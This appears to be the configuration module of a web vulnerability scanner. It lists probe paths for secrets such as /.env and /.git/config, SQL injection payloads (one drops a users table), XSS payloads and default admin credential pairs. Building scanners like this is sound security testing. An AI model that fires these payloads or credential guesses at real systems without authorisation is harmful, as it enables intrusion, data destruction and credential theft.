SCANNER_TIMEOUTS = {
    "sql_injection": 30,
    "xss": 30,
    "csrf": 20,
    "ssrf": 25,
    "information_disclosure": 15,
    "broken_authentication": 40,
    "security_headers": 10,
    "dependency_check": 60,
    "default": 30,
}

OWASP_IDS = {
    "broken_access_control": "A01:2021",
    "cryptographic_failures": "A02:2021",
    "injection": "A03:2021",
    "insecure_design": "A04:2021",
    "security_misconfiguration": "A05:2021",
    "vulnerable_components": "A06:2021",
    "auth_failures": "A07:2021",
    "data_integrity": "A08:2021",
    "logging_failures": "A09:2021",
    "ssrf": "A10:2021",
    "sql_injection": "A03:2021",
    "xss": "A03:2021",
    "csrf": "A01:2021",
}

COMMON_PATHS = [
    "/admin",
    "/admin.php",
    "/administrator",
    "/login",
    "/wp-admin",
    "/dashboard",
    "/config",
    "/settings",
    "/phpinfo.php",
    "/info.php",
    "/.git/config",
    "/.env",
    "/.git/HEAD",
    "/.svn/entries",
    "/backup",
    "/backups",
    "/database.sql",
    "/db.sql",
    "/dump.sql",
    "/wp-config.php",
    "/configuration.php",
    "/web.config",
    "/.htaccess",
    "/.htpasswd",
    "/server-status",
    "/server-info",
    "/status",
    "/health",
    "/actuator/health",
    "/api",
    "/api/v1",
    "/api/v2",
    "/rest",
    "/graphql",
    "/swagger",
    "/docs",
    "/swagger-ui",
    "/openapi",
    "/debug",
    "/trace",
    "/env",
    "/backup.zip",
    "/backup.tar.gz",
    "/site.tar.gz",
    "/database.tar.gz",
    "/phpMyAdmin",
    "/phpmyadmin",
    "/adminer",
    "/shell",
    "/cgi-bin/ls",
]

SQLI_PAYLOADS = [
    "'",
    "' OR '1'='1",
    "' OR '1'='1' --",
    "'; DROP TABLE users--",
    "1' ORDER BY 1--",
    "1' UNION SELECT NULL--",
    "1'; WAITFOR DELAY '0:0:5'--",
    "' AND 1=1--",
    "' AND 1=2--",
    "1' AND SLEEP(5)--",
]

XSS_PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert('XSS')>",
    "<svg onload=alert('XSS')>",
    "<iframe src=javascript:alert('XSS')>",
    "<body onload=alert('XSS')>",
    "javascript:alert('XSS')",
    "<script>alert(String.fromCharCode(88,83,83))</script>",
    "<img src=\"x\" onerror=\"alert(1)\">",
    "<input onfocus=alert('XSS') autofocus>",
    "<marquee onstart=alert('XSS')>",
]

DEFAULT_CREDENTIALS = [
    ("admin", "admin"),
    ("admin", "password"),
    ("admin", "123456"),
    ("root", "root"),
    ("root", "password"),
    ("user", "user"),
    ("test", "test"),
    ("administrator", "administrator"),
    ("guest", "guest"),
    ("manager", "manager"),
]

SENSITIVE_EXTENSIONS = [
    ".env",
    ".git",
    ".svn",
    ".bak",
    ".backup",
    ".sql",
    ".zip",
    ".tar",
    ".gz",
    ".rar",
    ".config",
    ".conf",
    ".ini",
    ".xml",
    ".json",
    ".key",
    ".pem",
    ".cert",
    ".htaccess",
    ".htpasswd",
    ".DS_Store",
    ".log",
    ".pdf",
    ".xlsx",
    ".csv",
    ".txt",
    ".md",
    ".yml",
    ".yaml",
    ".toml",
]
